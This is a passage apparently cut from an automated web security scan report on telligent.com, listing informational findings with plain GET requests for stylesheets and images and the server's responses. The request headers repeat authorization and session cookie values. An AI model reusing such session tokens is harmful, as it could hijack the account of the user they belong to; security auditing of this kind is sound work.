Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 23 Dec 2009 16:24:04 GMT
Accept-Ranges: bytes
ETag: "0aaad57ec83ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a43+GMT; expires=Sun, 26-Feb-2012 22:04:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:42 GMT
Content-Length: 18864

/* $Group Application Links
/******************************/
.content-fragment.group-application-navigation { position: relative; }
   .content-fragment.group-application-navigation .navigation-list
...[SNIP]...

7.498. http://telligent.com/themes/fiji/css/content-fragments-marketplace.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/content-fragments-marketplace.css

Request

GET /themes/fiji/css/content-fragments-marketplace.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 22 Sep 2010 23:02:06 GMT
Accept-Ranges: bytes
ETag: "656b452daa5acb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT; expires=Sun, 26-Feb-2012 22:04:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:41 GMT
Content-Length: 32126

/* $Marketplace
/******************************/
.marketplace-hero{
   background:url('../Images/Marketplace/group-hero.png') top left no-repeat;
   height:205px;
   margin-left:10px;
   width:903px;

...[SNIP]...

7.499. http://telligent.com/themes/fiji/css/content-fragments-mediagalleries.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/content-fragments-mediagalleries.css

Request

GET /themes/fiji/css/content-fragments-mediagalleries.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 11 Jan 2010 22:41:12 GMT
Accept-Ranges: bytes
ETag: "0b4dd2cf93ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a43+GMT; expires=Sun, 26-Feb-2012 22:04:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:42 GMT
Content-Length: 35321

/* $Media Gallery Title
/******************************/
.content-fragment.media-gallery-title { display: none; }

/* $Media Gallery Banner
/******************************/
.content-fragment.med
...[SNIP]...

7.500. http://telligent.com/themes/fiji/css/content-fragments-messages.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/content-fragments-messages.css

Request

GET /themes/fiji/css/content-fragments-messages.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Thu, 07 Jan 2010 17:37:58 GMT
Accept-Ranges: bytes
ETag: "09fbe26c08fca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT; expires=Sun, 26-Feb-2012 22:04:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:43 GMT
Content-Length: 28331

/* $Activity Message List
/******************************/
.content-fragment.activity-message-list { position: relative; height: 1%; }
   .content-fragment.activity-message-list .user-avatar { displa
...[SNIP]...

7.501. http://telligent.com/themes/fiji/css/content-fragments-weblogs.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/content-fragments-weblogs.css

Request

GET /themes/fiji/css/content-fragments-weblogs.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 04 Jan 2010 22:43:56 GMT
Accept-Ranges: bytes
ETag: "0deb9658f8dca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a43+GMT; expires=Sun, 26-Feb-2012 22:04:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:42 GMT
Content-Length: 38670

/* $Blog News
/******************************/
.content-fragment.blog-news .page { padding: 0; margin: 0; }
.content-fragment.blog-news .page-content { padding: 0; margin: 0; }

/* $Blog Title
/
...[SNIP]...

7.502. http://telligent.com/themes/fiji/css/content-fragments-wikis.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/content-fragments-wikis.css

Request

GET /themes/fiji/css/content-fragments-wikis.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Tue, 05 Jan 2010 14:55:08 GMT
Accept-Ranges: bytes
ETag: "06e8b12178eca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a43+GMT; expires=Sun, 26-Feb-2012 22:04:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:42 GMT
Content-Length: 24464

/* $Wiki Title
/******************************/
.content-fragment.wiki-title { display: none; }

/* $Wiki Banner
/******************************/
.content-fragment.wiki-banner .content-fragment-
...[SNIP]...

7.503. http://telligent.com/themes/fiji/css/content-fragments.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/content-fragments.css

Request

GET /themes/fiji/css/content-fragments.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 06 May 2009 16:27:24 GMT
Accept-Ranges: bytes
ETag: "0fe768967cec91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT; expires=Sun, 26-Feb-2012 22:04:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:41 GMT
Content-Length: 331

...@import url('content-fragments-core.css');
@import url('content-fragments-forums.css');
@import url('content-fragments-groups.css');
@import url('content-fragments-mediagalleries.css');
@import
...[SNIP]...

7.504. http://telligent.com/themes/fiji/css/custom.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/custom.css

Request

GET /themes/fiji/css/custom.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 01 Dec 2010 23:01:22 GMT
Accept-Ranges: bytes
ETag: "0decabab91cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT; expires=Sun, 26-Feb-2012 22:04:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:41 GMT
Content-Length: 46938

/* Fiji Theme Overrides */
html, body{
   background: url('../../Custom/images/background.png') top left repeat-x;
   background-color:#3A3D3F;
   font-family:Arial;
   font-size:9.5pt;
   color:#444;
}
...[SNIP]...

7.505. http://telligent.com/themes/fiji/css/footer-fragments.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/footer-fragments.css

Request

GET /themes/fiji/css/footer-fragments.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Thu, 20 Aug 2009 14:49:06 GMT
Accept-Ranges: bytes
ETag: "01dc55da521ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT; expires=Sun, 26-Feb-2012 22:04:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:41 GMT
Content-Length: 3667

.../* $Footer-Fragments
/******************************/
.footer-fragments { display: block; position: relative; padding: 10px; margin: 0 auto; }
.footer-fragments-header { border-top: solid 1px #c
...[SNIP]...

7.506. http://telligent.com/themes/fiji/css/fourroads-cms.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/fourroads-cms.css

Request

GET /themes/fiji/css/fourroads-cms.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a36+GMT; CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 27 Jan 2010 16:56:48 GMT
Accept-Ranges: bytes
ETag: "2b54e4b6719fca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT; expires=Sun, 26-Feb-2012 22:04:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:39 GMT
Content-Length: 11681

/* $Content Menu Header Fragment
/******************************/
.header-fragment-outer.content-menu-header-fragment { background: #555555 url(../images/group-nav-bkg.gif) repeat-x top left; }
.he
...[SNIP]...

7.507. http://telligent.com/themes/fiji/css/header-fragments.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/header-fragments.css

Request

GET /themes/fiji/css/header-fragments.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 21 Dec 2009 15:13:44 GMT
Accept-Ranges: bytes
ETag: "044892f5082ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT; expires=Sun, 26-Feb-2012 22:04:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:41 GMT
Content-Length: 18751

/* $Header-Fragments
/******************************/
.header-fragments { background-color: #fff; }
.fiji-header-fragment-inner { position: relative; width: 960px; margin: 0 auto; }

.fiji-header
...[SNIP]...

7.508. http://telligent.com/themes/fiji/css/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/print.css

Request

GET /themes/fiji/css/print.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a36+GMT; CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Thu, 20 Aug 2009 14:49:06 GMT
Accept-Ranges: bytes
ETag: "01dc55da521ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a38+GMT; expires=Sun, 26-Feb-2012 22:04:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:38 GMT
Content-Length: 5909

.layout, .page-editing, .page-tabs, .admin-bar .navigation-list, .admin-bar fieldset.field-list, .fiji-header-fragment-inner, .poweredby-wrapper, .footer-fragments, .footer-fragments-header, .footer-f
...[SNIP]...

7.509. http://telligent.com/themes/fiji/css/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/screen.css

Request

GET /themes/fiji/css/screen.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a38+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Thu, 23 Sep 2010 15:03:05 GMT
Accept-Ranges: bytes
ETag: "5d38ba6c305bcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT; expires=Sun, 26-Feb-2012 22:04:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:39 GMT
Content-Length: 220

@import url('base.css');
@import url('header-fragments.css');
@import url('content-fragments.css');
@import url('footer-fragments.css');
@import url('content-fragments-marketplace.css');
@import
...[SNIP]...

7.510. http://telligent.com/themes/fiji/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/favicon.ico

Request

GET /themes/fiji/favicon.ico HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53647277.670287554.1298757602.1298757602.1298757602.1; __utmc=53647277; __utmb=53647277.1.10.1298757602; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a53+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Fri, 19 Jun 2009 19:53:38 GMT
Accept-Ranges: bytes
ETag: "08d1ea317f1c91:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a56+GMT; expires=Sun, 26-Feb-2012 22:04:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:55 GMT
Content-Length: 1406

..............h.......(....... .........................................J..G...................................................{p...`...................................................................
...[SNIP]...

7.511. http://telligent.com/themes/fiji/images/group-nav-bkg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/images/group-nav-bkg.gif

Request

GET /themes/fiji/images/group-nav-bkg.gif HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a47+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Thu, 23 Jul 2009 17:27:34 GMT
Accept-Ranges: bytes
ETag: "0c769ddbabca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a52+GMT; expires=Sun, 26-Feb-2012 22:04:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:52 GMT
Content-Length: 840

GIF89a..P....333PPPSSSVVVWWWYYY[[[^^^___aaaeeefffiiikkklllnnnpppqqqsssvvvwwwyyy{{{......................................................................................................................
...[SNIP]...

7.512. http://telligent.com/themes/fiji/images/group-nav-sep.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/images/group-nav-sep.gif

Request

GET /themes/fiji/images/group-nav-sep.gif HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
